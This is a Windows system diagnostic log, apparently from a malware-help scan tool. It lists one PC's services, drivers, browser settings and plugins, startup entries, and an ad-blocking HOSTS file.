SRV - [2010/02/12 10:23:12 | 000,286,720 | ---- | M] (Creative Technology Ltd) [Auto | Running] -- C:\Program Files\Creative\Shared Files\CTAudSvc.exe -- (CTAudSvcService)
SRV - [2009/08/18 00:19:24 | 000,093,848 | ---- | M] (SiSoftware) [On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\RpcAgentSrv.exe -- (SandraAgentSrv)
SRV - [2009/02/19 16:10:54 | 000,238,968 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Symantec\LiveUpdate\AluSchedulerSvc.exe -- (Automatic LiveUpdate Scheduler)
SRV - [2009/02/19 16:09:53 | 003,220,856 | ---- | M] (Symantec Corporation) [On_Demand | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_4.EXE -- (LiveUpdate)
SRV - [2008/11/12 17:01:14 | 003,425,632 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Norton Ghost\Agent\VProSvc.exe -- (Norton Ghost)
SRV - [2008/06/26 19:09:36 | 000,167,936 | ---- | M] () [Auto | Running] -- C:\Program Files\TRENDnet\TEW-805UB\WlanWpsSvc.exe -- (WlanWpsSvc)
SRV - [2008/01/29 17:38:31 | 000,583,048 | ---- | M] (Symantec Corporation) [Auto | Running] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service)
SRV - [2008/01/19 03:38:24 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV - [2007/02/27 19:08:38 | 000,689,672 | ---- | M] (American Power Conversion Corporation) [Auto | Running] -- C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe -- (APC UPS Service)
SRV - [2007/02/22 20:53:16 | 002,217,416 | ---- | M] () [Auto | Stopped] -- C:\Program Files\Common Files\Acronis\Acronis Disk Director\oss_reinstall_svc.exe -- (AcronisOSSReinstallSvc)
SRV - [2007/02/13 07:26:50 | 000,053,248 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService)
 
 
========== Driver Services (SafeList) ==========
 
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\SymIM.sys -- (SymIMMP)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\Motousbnet.sys -- (Motousbnet)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motswch.sys -- (MotoSwitchService)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motmodem.sys -- (motmodem)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motodrv.sys -- (MotDev)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgpfl.sys -- (motccgpfl)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motccgp.sys -- (motccgp)
DRV - File not found [Kernel | On_Demand | Stopped] -- System32\Drivers\motoandroid.sys -- (motandroidusb)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp)
DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\motfilt.sys -- (BTCFilterService)
DRV - File not found [Kernel | Disabled | Stopped] -- C:\Windows\system32\drivers\blbdrive.sys -- (blbdrive)
DRV - [2014/03/11 09:52:30 | 000,104,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NisDrvWFP.sys -- (NisDrv)
DRV - [2013/02/26 00:22:06 | 008,939,296 | ---- | M] (NVIDIA Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\nvlddmkm.sys -- (nvlddmkm)
DRV - [2013/02/09 07:23:00 | 001,957,448 | ---- | M] (Realtek Semiconductor Corporation                           ) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\RTWlanU.sys -- (RtlWlanu)
DRV - [2011/08/21 13:10:33 | 000,232,512 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV - [2011/08/02 09:59:41 | 000,105,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv)
DRV - [2011/07/22 12:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 17:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2011/05/12 09:44:04 | 000,374,392 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl)
DRV - [2010/09/02 17:49:08 | 000,013,312 | ---- | M] (June Fabrics Technology Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\pneteth.sys -- (pneteth)
DRV - [2010/03/18 20:50:12 | 000,189,528 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP17v2k.sys -- (hap17v2k)
DRV - [2010/03/18 20:50:04 | 000,162,904 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\haP16v2k.sys -- (hap16v2k)
DRV - [2010/03/18 20:49:56 | 000,798,808 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ha10kx2k.sys -- (ha10kx2k)
DRV - [2010/03/18 20:45:42 | 000,092,760 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\emupia2k.sys -- (emupia)
DRV - [2010/03/18 20:45:28 | 000,157,272 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctsfm2k.sys -- (ctsfm2k)
DRV - [2010/03/18 20:45:20 | 000,014,424 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctprxy2k.sys -- (ctprxy2k)
DRV - [2010/03/18 20:45:12 | 000,127,576 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctoss2k.sys -- (ossrv)
DRV - [2010/03/18 20:40:48 | 000,347,144 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ctdvda2k.sys -- (ctdvda2k)
DRV - [2010/03/18 20:40:40 | 000,528,472 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctaud2k.sys -- (ctaud2k)
DRV - [2010/03/18 20:40:32 | 000,511,064 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\ctac32k.sys -- (ctac32k)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX.SYS)
DRV - [2010/03/18 20:39:36 | 000,100,952 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTERFXFX.sys -- (CTERFXFX)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX.SYS)
DRV - [2010/03/18 20:39:28 | 000,566,360 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTSBLFX.sys -- (CTSBLFX)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX.SYS)
DRV - [2010/03/18 20:39:18 | 000,555,096 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\CTAUDFX.sys -- (CTAUDFX)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX.SYS)
DRV - [2010/03/18 20:39:10 | 000,099,416 | ---- | M] (Creative Technology Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\COMMONFX.sys -- (COMMONFX)
DRV - [2009/11/20 15:49:30 | 000,465,408 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\SISGRKMD.sys -- (SiS6350)
DRV - [2009/11/13 12:40:41 | 000,058,416 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\SISAGPX.SYS -- (SISAGP)
DRV - [2009/08/08 00:46:56 | 000,023,112 | ---- | M] (SiSoftware) [Kernel | On_Demand | Stopped] -- C:\Program Files\SiSoftware\SiSoftware Sandra Lite 2011\WNt500x86\sandra.sys -- (SANDRA)
DRV - [2009/04/11 00:42:52 | 000,031,616 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUSB)
DRV - [2009/02/04 01:21:11 | 000,005,632 | ---- | M] () [File_System | System | Running] -- C:\Windows\System32\drivers\StarOpen.sys -- (StarOpen)
DRV - [2009/01/08 10:42:54 | 000,036,608 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\System32\FsUsbExDisk.Sys -- (FsUsbExDisk)
DRV - [2008/11/12 16:49:22 | 000,138,080 | ---- | M] (StorageCraft) [File_System | Boot | Running] -- C:\Windows\System32\drivers\symsnap.sys -- (symsnap)
DRV - [2008/02/22 16:33:02 | 000,114,304 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdm.sys -- (sscdmdm)
DRV - [2008/02/22 16:33:02 | 000,094,336 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdserd.sys -- (sscdserd)
DRV - [2008/02/22 16:33:02 | 000,014,976 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdmdfl.sys -- (sscdmdfl)
DRV - [2008/02/22 16:33:00 | 000,087,936 | ---- | M] (MCCI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\sscdbus.sys -- (sscdbus)
DRV - [2008/01/04 16:06:37 | 000,114,048 | ---- | M] (Acronis) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\snapman.sys -- (snapman)
DRV - [2007/07/31 17:22:16 | 000,014,072 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vproeventmonitor.sys -- (VProEventMonitor)
DRV - [2007/07/09 06:48:44 | 000,020,622 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\bcmndis.sys -- (USB_NDIS_51)
DRV - [2007/04/23 10:50:50 | 000,025,896 | ---- | M] (Windows ® Codename Longhorn DDK provider) [Kernel | System | Running] -- C:\Windows\System32\drivers\RtlProt.sys -- (RtlProt)
DRV - [2007/03/28 21:49:42 | 000,128,104 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\WimFltr.sys -- (WimFltr)
DRV - [2007/03/28 21:29:10 | 000,037,864 | ---- | M] (Symantec Corporation) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\v2imount.sys -- (v2imount)
DRV - [2007/02/06 14:27:04 | 000,185,728 | ---- | M] (Hauppauge Computer Works, Inc.) [23|25|26]xxx) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\hcwPP2.sys -- (hcwPP2)
DRV - [2007/01/22 04:09:08 | 000,046,592 | ---- | M] (Silicon Integrated Systems Corp.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SiSGB6.sys -- (SiSGbeLH)
DRV - [2007/01/09 09:22:28 | 000,006,144 | ---- | M] (Chic) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\moufiltr.sys -- (moufiltr)
DRV - [2006/12/07 19:12:02 | 000,076,584 | ---- | M] () [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15)
DRV - [2006/09/19 17:47:04 | 000,080,744 | ---- | M] (Wasay) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSVD.sys -- (WSVD)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://en.us.acer.yahoo.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://en.us.acer.yahoo.com
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SEARCH PAGE = http://g.msn.com/0SE...S01?FORM=TOOLBR
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultName = Yahoo! Search
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://search.yahoo....=utf-8&fr=b1ie7
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1
IE - HKCU\..\SearchScopes,DefaultScope = {DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKCU\..\SearchScopes\{DC3C0BC4-487D-413F-8EF7-81BA5B62BAA5}: "URL" = http://www.google.co...1I7GGIH_enUS252
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultenginename: "Google"
FF - prefs.js..browser.search.defaulturl: "http://www.google.co...-8&oe=UTF-8&q="
FF - prefs.js..browser.search.selectedEngine: "Google"
FF - prefs.js..browser.search.update: false
FF - prefs.js..browser.startup.homepage: "https://www.google.com/"
FF - prefs.js..extensions.enabledAddons: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.2.172
FF - prefs.js..extensions.enabledItems: {BBDA0591-3099-440a-AA10-41764D9DB4DB}:2.0
FF - prefs.js..extensions.enabledItems: {2D3F3651-74B9-4795-BDEC-6DA2F431CB62}:4.6
FF - prefs.js..extensions.enabledItems: {23fcfd51-4958-4f00-80a3-ae97e717ed8b}:2.1.0.900
FF - prefs.js..extensions.enabledItems: {6904342A-8307-11DF-A508-4AE2DFD72085}:2.1.0.900
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_13_0_0_214.dll ()
FF - HKLM\Software\MozillaPlugins\@adobe.com/ShockwavePlayer: C:\Windows\system32\Adobe\Director\np32dsw_1200112.dll (Adobe Systems, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: C:\Program Files\DivX\DivX Player\npDivxPlayerPlugin.dll File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.55.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@messenger.yahoo.com/YahooMessengerStatePlugin;version=1.0.0.6: C:\Program Files\Yahoo!\Shared\npYState.dll (Yahoo! Inc.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/VirtualEarth3D,version=2.0: C:\Program Files\Virtual Earth 3D\ [2007/12/14 12:10:25 | 000,000,000 | ---D | M]
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF - HKLM\Software\MozillaPlugins\@pack.google.com/Google Updater;version=14: C:\Program Files\Google\Google Updater\2.4.2432.1652\npCIDetect14.dll (Google)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{203FB6B2-2E1E-4474-863B-4C483ECCE78E}: C:\ProgramData\Norton\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST_1.2.0.6\coFFNST\ [2011/08/02 11:25:28 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2013/03/04 17:15:27 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/02/02 21:11:39 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 4.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2013/01/14 23:59:14 | 000,000,000 | ---D | M]
 
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions
[2010/11/26 00:13:47 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Extensions\{3550f703-e582-4d05-9a08-453d09bdfdc6}
[2014/05/19 22:34:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions
[2010/08/07 16:01:40 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}
[2012/02/23 22:12:56 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Users\Ken\AppData\Roaming\Mozilla\Firefox\Profiles\8agrx3pn.default\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2012/06/19 10:53:37 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2007/12/15 02:49:00 | 000,000,000 | ---D | M] (Google Toolbar for Firefox) -- C:\Program Files\Mozilla Firefox\extensions\{3112ca9c-de6d-4884-a869-9855de68056c}
[2013/03/04 17:15:27 | 000,000,000 | ---D | M] (No name found) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2011/03/18 13:53:24 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/06/28 11:42:00 | 000,012,800 | ---- | M] (Nullsoft, Inc.) -- C:\Program Files\mozilla firefox\plugins\npwachk.dll
[2010/01/01 04:00:00 | 000,002,252 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - homepage: http://www.google.com
CHR - plugin: First user (Enabled) = c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - plugin: Error reading preferences file
CHR - Extension: Google Wallet = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: DivX Plus Web Player HTML5 <video> = C:\Users\Ken\AppData\Local\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.172_0\
 
O1 HOSTS File: ([2014/05/19 20:35:59 | 000,431,917 | ---- | M]) - C:\Windows\System32\drivers\etc\HOSTS
O1 - Hosts: 127.0.0.1  localhost
O1 - Hosts: ::1  localhost    #[IPv6]
O1 - Hosts: 0.0.0.0  fr.a2dfp.net
O1 - Hosts: 0.0.0.0  m.fr.a2dfp.net
O1 - Hosts: 0.0.0.0  mfr.a2dfp.net
O1 - Hosts: 0.0.0.0  ad.a8.net
O1 - Hosts: 0.0.0.0  asy.a8ww.net
O1 - Hosts: 0.0.0.0  static.a-ads.com
O1 - Hosts: 0.0.0.0  abcstats.com
O1 - Hosts: 0.0.0.0  ad4.abradio.cz
O1 - Hosts: 0.0.0.0  a.abv.bg
O1 - Hosts: 0.0.0.0  adserver.abv.bg
O1 - Hosts: 0.0.0.0  adv.abv.bg
O1 - Hosts: 0.0.0.0  bimg.abv.bg
O1 - Hosts: 0.0.0.0  ca.abv.bg
O1 - Hosts: 0.0.0.0  www2.a-counter.kiev.ua
O1 - Hosts: 0.0.0.0  track.acclaimnetwork.com
O1 - Hosts: 0.0.0.0  accuserveadsystem.com
O1 - Hosts: 0.0.0.0  www.accuserveadsystem.com
O1 - Hosts: 0.0.0.0  achmedia.com
O1 - Hosts: 0.0.0.0  csh.actiondesk.com
O1 - Hosts: 0.0.0.0  ads.activepower.net
O1 - Hosts: 0.0.0.0  app.activetrail.com
O1 - Hosts: 0.0.0.0  stat.active24stats.nl    #[Tracking.Cookie]
O1 - Hosts: 0.0.0.0  traffic.acwebconnecting.com
O1 - Hosts: 13627 more lines...
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (no name) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - No CLSID value found.
O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3 - HKLM\..\Toolbar: (no name) - {30CEEEA2-3742-40e4-85DD-812BF1CBB83D} - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - No CLSID value found.
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - No CLSID value found.
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [BCSSync] C:\Program Files\Microsoft Office\Office14\BCSSync.exe (Microsoft Corporation)
O4 - HKLM..\Run: [CTHelper] C:\Windows\System32\CtHelper.exe (Creative Technology Ltd)
O4 - HKLM..\Run: [DivXMediaServer] C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe (DivX, LLC)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4 - HKLM..\Run: [RtHDVCpl] C:\Windows\RtHDVCpl.exe (Realtek Semiconductor)
O4 - HKLM..\Run: [Symantec PIF AlertEng] C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe (Symantec Corporation)
O4 - HKCU..\Run: [HostsMan] C:\Program Files\HostsMan\hm.exe (abelhadigital.com)
O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE (SUPERAntiSpyware)
O4 - Startup: C:\Users\Ken\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk = C:\Users\Ken\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
O8 - Extra context menu item: E&xport to Microsoft Excel - C:\Program Files\Microsoft Office\Office14\EXCEL.EXE (Microsoft Corporation)
O8 - Extra context menu item: Se&nd to OneNote - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll (Microsoft Corporation)
O9 - Extra Button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O13 - gopher Prefix: missing
O16 - DPF: {05317530-B882-449D-9421-18D94FA3ED34} http://www.sis.com/ocis/OSInfo.cab (OSInfo Control)
